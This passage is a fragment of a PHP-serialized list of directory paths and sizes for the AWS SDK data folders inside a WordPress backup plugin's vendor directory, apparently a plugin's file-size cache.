ugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/quicksight/2018-04-01\";i:192202;s:111:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/quicksight\";i:192202;s:129:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/autoscaling-plans/2018-01-06\";i:17514;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/autoscaling-plans\";i:17514;s:132:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/codestar-connections/2019-12-01\";i:12736;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/codestar-connections\";i:12736;s:128:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/streams.dynamodb/2012-08-10\";i:9730;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/streams.dynamodb\";i:9730;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/batch/2016-08-10\";i:35922;s:106:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/batch\";i:35922;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cur/2017-01-06\";i:6885;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cur\";i:6885;s:123:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/personalize/2018-05-22\";i:53040;s:112:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/personalize\";i:53040;s:126:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/serverlessrepo/2017-09-08\";i:37632;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/serverlessrepo\";i:37632;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/polly/2016-06-10\";i:19323;s:106:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/polly\";i:19323;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/forecast/2018-06-26\";i:44627;s:109:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/forecast\";i:44627;s:140:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/kinesis-video-archived-media/2017-09-30\";i:12630;s:129:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/kinesis-video-archived-media\";i:12630;s:119:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/amplify/2017-07-25\";i:56595;s:108:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/amplify\";i:56595;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/health/2016-08-04\";i:22999;s:107:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/health\";i:22999;s:127:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/license-manager/2018-08-01\";i:59922;s:116:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/license-manager\";i:59922;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/backup/2018-11-15\";i:68130;s:107:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/backup\";i:68130;s:125:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/frauddetector/2019-11-15\";i:62482;s:114:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/frauddetector\";i:62482;s:123:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/devops-guru/2020-12-01\";i:40797;s:112:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/devops-guru\";i:40797;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ssm/2014-11-06\";i:269958;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ssm\";i:269958;s:125:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/identitystore/2020-06-15\";i:7531;s:114:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/identitystore\";i:7531;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sms-voice/2018-09-05\";i:12596;s:110:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sms-voice\";i:12596;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01\";i:94052;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/dms\";i:94052;s:123:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iotfleethub/2020-11-03\";i:11272;s:112:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iotfleethub\";i:11272;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/braket/2019-09-01\";i:15886;s:107:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/braket\";i:15886;s:127:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/appintegrations/2020-07-29\";i:13011;s:116:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/appintegrations\";i:13011;s:135:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/application-autoscaling/2016-02-06\";i:23214;s:124:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/application-autoscaling\";i:23214;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ec2/2016-04-01\";i:295527;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15\";i:304730;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ec2/2015-10-01\";i:290643;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15\";i:758018;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ec2\";i:1648918;s:125:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/forecastquery/2018-06-26\";i:3370;s:114:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/forecastquery\";i:3370;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/states/2016-11-23\";i:39630;s:107:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/states\";i:39630;s:129:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/codeguru-reviewer/2019-09-19\";i:25788;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/codeguru-reviewer\";i:25788;s:134:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01\";i:63035;s:123:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2\";i:63035;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/gamelift/2015-10-01\";i:121650;s:109:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/gamelift\";i:121650;s:131:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/kinesis-video-media/2017-09-30\";i:3938;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/kinesis-video-media\";i:3938;s:126:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iotevents-data/2018-10-23\";i:10546;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iotevents-data\";i:10546;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-01-28\";i:55365;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-06-18\";i:99777;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-11-05\";i:101791;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-20\";i:64746;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31\";i:149421;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07\";i:65757;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-01\";i:63714;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30\";i:99733;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25\";i:67760;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29\";i:65866;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudfront/2015-07-27\";i:62725;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25\";i:69334;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudfront/2019-03-26\";i:102498;s:111:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudfront\";i:1068487;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/kendra/2019-02-03\";i:70738;s:107:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/kendra\";i:70738;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ecr/2015-09-21\";i:50833;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ecr\";i:50833;s:124:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mediapackage/2017-10-12\";i:48710;s:113:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mediapackage\";i:48710;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudtrail/2013-11-01\";i:32981;s:111:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudtrail\";i:32981;s:126:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sagemaker-edge/2020-09-23\";i:3739;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sagemaker-edge\";i:3739;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sso-admin/2020-07-20\";i:42396;s:110:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sso-admin\";i:42396;s:119:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/budgets/2016-10-20\";i:35625;s:108:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/budgets\";i:35625;s:124:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/codeartifact/2018-09-22\";i:58674;s:113:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/codeartifact\";i:58674;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mediastore/2017-09-01\";i:19797;s:111:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mediastore\";i:19797;s:129:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/customer-profiles/2020-08-15\";i:40760;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/customer-profiles\";i:40760;s:124:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mediaconvert/2017-08-29\";i:185250;s:113:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mediaconvert\";i:185250;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01\";i:61300;s:110:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/appstream\";i:61300;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/email/2010-12-01\";i:80128;s:106:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/email\";i:80128;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/macie/2017-12-19\";i:9037;s:106:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/macie\";i:9037;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/lex-models/2017-04-19\";i:65265;s:111:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/lex-models\";i:65265;s:131:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/migrationhub-config/2019-06-30\";i:5569;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/migrationhub-config\";i:5569;s:125:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/lakeformation/2017-03-31\";i:18605;s:114:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/lakeformation\";i:18605;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/s3control/2018-08-20\";i:63265;s:110:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/s3control\";i:63265;s:125:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/groundstation/2019-05-23\";i:35926;s:114:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/groundstation\";i:35926;s:127:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/resource-groups/2017-11-27\";i:24396;s:116:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/resource-groups\";i:24396;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/robomaker/2018-06-29\";i:86751;s:110:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/robomaker\";i:86751;s:123:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/eventbridge/2015-10-07\";i:69592;s:112:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/eventbridge\";i:69592;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sso-oidc/2019-06-10\";i:8043;s:109:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sso-oidc\";i:8043;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/firehose/2015-08-04\";i:46817;s:109:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/firehose\";i:46817;s:125:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/models.lex.v2/2020-08-07\";i:87114;s:114:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/models.lex.v2\";i:87114;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31\";i:70377;s:106:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/docdb\";i:70377;s:126:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudformation/2010-05-15\";i:97027;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudformation\";i:97027;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/discovery/2015-11-01\";i:36711;s:110:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/discovery\";i:36711;s:126:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/accessanalyzer/2019-11-01\";i:28457;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/accessanalyzer\";i:28457;s:142:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sagemaker-featurestore-runtime/2020-07-01\";i:4977;s:131:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sagemaker-featurestore-runtime\";i:4977;s:132:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/application-insights/2018-11-25\";i:36616;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/application-insights\";i:36616;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/dax/2017-04-19\";i:28916;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/dax\";i:28916;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/eks/2017-11-01\";i:55343;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/eks\";i:55343;s:126:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/secretsmanager/2017-10-17\";i:31148;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/secretsmanager\";i:31148;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/waf/2015-08-24\";i:91394;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/waf\";i:91394;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/opsworkscm/2016-11-01\";i:24398;s:111:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/opsworkscm\";i:24398;s:119:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/acm-pca/2017-08-22\";i:35168;s:108:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/acm-pca\";i:35168;s:119:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/connect/2017-08-08\";i:137520;s:108:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/connect\";i:137520;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sagemaker/2017-07-24\";i:396684;s:110:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sagemaker\";i:396684;s:128:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/elasticbeanstalk/2010-12-01\";i:72797;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/elasticbeanstalk\";i:72797;s:127:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/machinelearning/2014-12-12\";i:49086;s:116:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/machinelearning\";i:49086;s:126:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/clouddirectory/2016-05-10\";i:116345;s:126:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/clouddirectory/2017-01-11\";i:118792;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/clouddirectory\";i:235137;s:127:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mturk-requester/2017-01-17\";i:43205;s:116:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mturk-requester\";i:43205;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/chime/2018-05-01\";i:238975;s:106:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/chime\";i:238975;s:130:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/personalize-events/2018-03-22\";i:4645;s:119:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/personalize-events\";i:4645;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudhsmv2/2017-04-28\";i:21200;s:111:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudhsmv2\";i:21200;s:128:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iotdeviceadvisor/2020-09-18\";i:19845;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iotdeviceadvisor\";i:19845;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/kafka/2018-11-14\";i:55039;s:106:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/kafka\";i:55039;s:116:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/logs/2014-03-28\";i:46407;s:105:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/logs\";i:46407;s:116:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/xray/2016-04-12\";i:46594;s:105:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/xray\";i:46594;s:123:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudsearch/2013-01-01\";i:36908;s:112:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudsearch\";i:36908;s:129:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/compute-optimizer/2019-11-01\";i:34302;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/compute-optimizer\";i:34302;s:124:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/importexport/2010-06-01\";i:14818;s:113:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/importexport\";i:14818;s:119:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/schemas/2019-12-02\";i:49156;s:108:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/schemas\";i:49156;s:135:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/kinesis-video-signaling/2019-12-04\";i:4866;s:124:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/kinesis-video-signaling\";i:4866;s:114:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ce/2017-10-25\";i:67333;s:103:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ce\";i:67333;s:131:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/workmailmessageflow/2019-05-01\";i:3623;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/workmailmessageflow\";i:3623;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iot/2015-05-28\";i:334708;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iot\";i:334708;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/datasync/2018-11-09\";i:42577;s:109:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-b